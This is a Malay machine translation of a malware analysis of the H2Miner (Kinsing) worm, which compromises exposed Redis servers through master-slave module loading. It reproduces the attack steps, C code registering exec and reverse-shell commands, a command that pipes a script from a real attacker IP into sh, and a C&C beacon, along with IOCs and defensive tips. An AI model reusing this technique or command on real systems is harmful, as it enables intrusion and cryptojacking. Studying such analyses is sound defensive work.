Sehari yang lalu, salah satu pelayan projek saya telah diserang oleh cacing yang serupa. Untuk mencari jawapan kepada soalan "apa itu?" Saya menemui artikel hebat oleh pasukan Keselamatan Awan Alibaba. Memandangkan saya tidak menemui artikel ini di Habré, saya memutuskan untuk menterjemahkannya khas untuk anda <3
Entry
Baru-baru ini, pasukan keselamatan Alibaba Cloud menemui wabak H2Miner secara tiba-tiba. Jenis cecacing berniat jahat ini menggunakan kekurangan kebenaran atau kata laluan yang lemah untuk Redis sebagai pintu masuk ke sistem anda, selepas itu ia menyegerakkan modul hasadnya sendiri dengan hamba melalui penyegerakan tuan-hamba dan akhirnya memuat turun modul hasad ini ke mesin yang diserang dan melaksanakan hasad. arahan.
Pada masa lalu, serangan pada sistem anda dilakukan terutamanya menggunakan kaedah yang melibatkan tugas berjadual atau kunci SSH yang ditulis pada mesin anda selepas penyerang melog masuk ke Redis. Nasib baik, kaedah ini tidak boleh digunakan selalu kerana masalah dengan kawalan kebenaran atau disebabkan versi sistem yang berbeza. Walau bagaimanapun, kaedah memuatkan modul berniat jahat ini boleh secara langsung melaksanakan arahan penyerang atau mendapat akses kepada shell, yang berbahaya untuk sistem anda.
Oleh kerana bilangan yang banyak pelayan Dengan hampir 1 juta contoh Redis yang dihoskan dalam talian, pasukan keselamatan Alibaba Cloud, sebagai peringatan mesra, mengesyorkan agar pengguna tidak membenarkan akses Redis daripada rangkaian dan kerap menguji kata laluan mereka untuk kekuatan dan kerentanan terhadap kekerasan.
H2Miner
H2Miner ialah botnet perlombongan untuk sistem berasaskan Linux, yang boleh menyusup masuk ke sistem anda melalui pelbagai cara, termasuk kelemahan pelaksanaan arahan jauh (RCE) Hadoop yarn, Docker dan Redis yang tidak dibenarkan. Botnet beroperasi dengan memuat turun skrip berniat jahat dan perisian hasad untuk melombong data anda, pengembangan lateral serangan dan mengekalkan komunikasi arahan dan kawalan (C&C).
Redis RCE
Pengetahuan mengenai subjek ini dikongsi oleh Pavel Toporkov di ZeroNights 2018. Selepas versi 4.0, Redis menyokong ciri pemuatan pemalam yang memberi pengguna keupayaan untuk memuatkan supaya fail disusun dengan C ke dalam Redis untuk melaksanakan arahan Redis tertentu. Fungsi ini, walaupun berguna, mengandungi kelemahan di mana, dalam mod tuan-hamba, fail boleh disegerakkan dengan hamba melalui mod penyegerakan penuh. Ini boleh digunakan oleh penyerang untuk memindahkan fail jadi berniat jahat. Selepas pemindahan selesai, penyerang memuatkan modul ke dalam contoh Redis yang diserang dan melaksanakan sebarang arahan.
Analisis Worm Malware
Baru-baru ini, pasukan keselamatan Alibaba Cloud mendapati bahawa saiz kumpulan pelombong berniat jahat H2Miner telah meningkat secara mendadak. Menurut analisis, proses umum kejadian serangan adalah seperti berikut:
H2Miner menggunakan RCE Redis untuk serangan penuh. Penyerang mula-mula menyerang pelayan atau pelayan Redis yang tidak dilindungi dengan kata laluan yang lemah.
Kemudian mereka menggunakan arahan config set dbfilename red2.so untuk menukar nama fail. Selepas ini, penyerang melaksanakan arahan slaveof untuk menetapkan alamat hos replikasi tuan-hamba.
Apabila tika Redis yang diserang mewujudkan sambungan tuan-hamba dengan Redis berniat jahat yang dimiliki oleh penyerang, penyerang menghantar modul yang dijangkiti menggunakan perintah fullresync untuk menyegerakkan fail. Fail red2.so kemudiannya akan dimuat turun ke mesin yang diserang. Penyerang kemudian menggunakan modul pemuatan ./red2.so untuk memuatkan fail ini. Modul ini boleh melaksanakan arahan daripada penyerang atau memulakan sambungan terbalik (pintu belakang) untuk mendapatkan akses kepada mesin yang diserang.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Selepas melaksanakan perintah jahat seperti / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, penyerang akan menetapkan semula nama fail sandaran dan memunggah modul sistem untuk membersihkan jejak. Walau bagaimanapun, fail red2.so masih akan kekal pada mesin yang diserang. Pengguna dinasihatkan untuk memberi perhatian kepada kehadiran fail yang mencurigakan sedemikian dalam folder contoh Redis mereka.
Selain membunuh beberapa proses berniat jahat untuk mencuri sumber, penyerang mengikuti skrip berniat jahat dengan memuat turun dan melaksanakan fail binari berniat jahat ke . Ini bermakna nama proses atau nama direktori yang mengandungi kinsing pada hos mungkin menunjukkan bahawa mesin itu telah dijangkiti virus ini.
Mengikut keputusan kejuruteraan terbalik, perisian hasad terutamanya menjalankan fungsi berikut:
- Memuat naik fail dan melaksanakannya
- Perlombongan
- Mengekalkan komunikasi C&C dan melaksanakan arahan penyerang
Gunakan imbasan besar-besaran untuk pengimbasan luaran untuk mengembangkan pengaruh anda. Di samping itu, alamat IP pelayan C&C dikodkan keras dalam program, dan hos yang diserang akan berkomunikasi dengan pelayan komunikasi C&C menggunakan permintaan HTTP, di mana maklumat zombi (pelayan yang terjejas) dikenal pasti dalam pengepala HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Kaedah serangan lain
Alamat dan pautan yang digunakan oleh cacing
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Petua
Pertama, Redis tidak boleh diakses dari Internet dan harus dilindungi dengan kata laluan yang kuat. Ia juga penting untuk pelanggan menyemak bahawa tiada fail red2.so dalam direktori Redis dan tiada "kinsing" dalam nama fail/proses pada hos.
Sumber: www.habr.com
